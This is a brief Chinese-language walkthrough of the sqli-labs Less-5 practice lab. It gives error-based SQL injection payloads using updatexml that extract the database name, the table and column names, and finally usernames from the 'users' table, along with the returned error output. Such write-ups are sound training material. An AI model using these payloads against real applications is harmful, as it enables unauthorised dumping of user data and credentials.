打开网页http://47.93.12.178:4567/Less-5/
看到：Please input the ID as parameter with numeric value

随便写一个id=0
啥也没有

在id=0后面套模板：'or(updatexml(1,concat(0x7e,(select database()),0x7e),1))or'1：
得到：XPATH syntax error: '~security~'

在id=0后面套模板：'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))or'1
得到：XPATH syntax error: '~emails,referers,uagents,users~'

在id=0后面套模板：%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1))or%271
得到：XPATH syntax error: '~id,username,password~'

在id=0后面写：%27%20and%20updatexml(%27a%27,concat(0x7e,(select%20substr((select%20group_concat(id,%27$%27,username)%20from%20users),30,32)),0x7e),%27a%27)%23
最后得到：
XPATH syntax error: '~ecure,5$stupid,6$superman,7$bat'
